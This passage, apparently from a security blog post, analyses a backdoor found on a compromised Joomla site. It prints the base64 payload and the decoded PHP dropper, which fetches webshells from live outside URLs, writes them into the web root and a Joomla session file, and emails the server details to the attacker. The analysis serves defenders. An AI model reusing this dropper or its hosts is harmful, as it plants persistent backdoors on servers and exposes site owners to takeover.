Z2V0KCdodHRwOi8vcGFzdGViaW4uY29tL3Jhdy9VSEFHVDg4NycpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICIiOw0KJHN1YmplY3QgPSAnSm9tIHp6eiAnIC4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107DQokaGVhZGVyID0gJ2Zyb206IEtla2thaSBTZW5zZW4gPHZvblJlaW5oZXJ6S2xhdXNAU2Fpa291bmFIaWJpLmNvbT4nIC4gIlxyXG4iOw0KJG1lc3NhZ2UgPSAiU2hlbGx6IDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qbWFpbC5waHA/dSIgLiAiXHJcbiIgLiBwaHBfdW5hbWUoKSAuICJcclxuIjsNCiRzZW50bWFpbCA9IEBtYWlsKCR0b3osICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQoNCkB1bmxpbmsoX19GSUxFX18pOw0KDQoNCj8+'));
fclose(\$fp);

Above you see they are opening a new file in your web root folder called xxxx.php and writing something to it. What you may ask? Let's do a base64 decode again on whatever it is. Ah interesting, we get some PHP code below

<?php
function http_get(\$url){
\$im = curl_init(\$url);
curl_setopt(\$im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt(\$im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt(\$im, CURLOPT_FOLLOWLOCATION, 1);
return curl_exec(\$im);
curl_close(\$im);
}
\$check = \$_SERVER['DOCUMENT_ROOT'] . "/media/css.php" ;
\$text = http_get('http://mrtg.ui.phinma.edu.ph/components/joomla.txt');
\$open = fopen(\$check, 'w');
fwrite(\$open, \$text);
fclose(\$open);
if(file_exists(\$check)){
echo \$check."
";
}else
echo "not exits";
echo "done .\n " ;
\$check2 = \$_SERVER['DOCUMENT_ROOT'] . "/media/jmail.php" ;
\$text2 = http_get('http://mrtg.ui.phinma.edu.ph/components/jmailz.txt');
\$open2 = fopen(\$check2, 'w');
fwrite(\$open2, \$text2);
fclose(\$open2);
if(file_exists(\$check2)){
echo \$check2."
";
}else
echo "not exits2";
echo "done2 .\n " ;

\$check3=\$_SERVER['DOCUMENT_ROOT'] . "/H.htm" ;
\$text3 = http_get('');
\$op3=fopen(\$check3, 'w');
fwrite(\$op3,\$text3);
fclose(\$op3);

\$check4=\$_SERVER['DOCUMENT_ROOT'] . "/media/check.php" ;
\$text4 = http_get('http://mrtg.ui.phinma.edu.ph/components/qq.txt');
\$op4=fopen(\$check4, 'w');
fwrite(\$op4,\$text4);
fclose(\$op4);

\$check5=\$_SERVER['DOCUMENT_ROOT'] . "//media/jmails.php" ;
\$text5 = http_get('http://mrtg.ui.phinma.edu.ph/components/qqz.txt');
\$op5=fopen(\$check5, 'w');
fwrite(\$op5,\$text5);
fclose(\$op5);

\$check6=\$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/session/session.php" ;
\$text6 = http_get('http://pastebin.com/raw/UHAGT887');
\$op6=fopen(\$check6, 'w');
fwrite(\$op6,\$text6);
fclose(\$op6);

\$toz = "";
\$subject = 'Jom zzz ' . \$_SERVER['SERVER_NAME'];
\$header = 'from: Kekkai Sensen ' . "\r\n";
\$message = "Shellz : http://" . \$_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
\$sentmail = @mail(\$toz, \$subject, \$message, \$header);

?>

Now the attacker can access the file on your site www.mysite.com/media/xxxx.php. As soon as he does, the php code above creates another file called css.php which is based off the contents of this malicious url hxxp://mrtg.ui.phinma.edu.ph/components/joomla.txt . Actually it does this over and over creating a bunch of backdoors or webshells so that even if the good guy finds and removes 1 or 2 of these files, the attacker will still have a way back onto your compromised machine. Finally at the end an email is sent to indicate the code ran succesfully.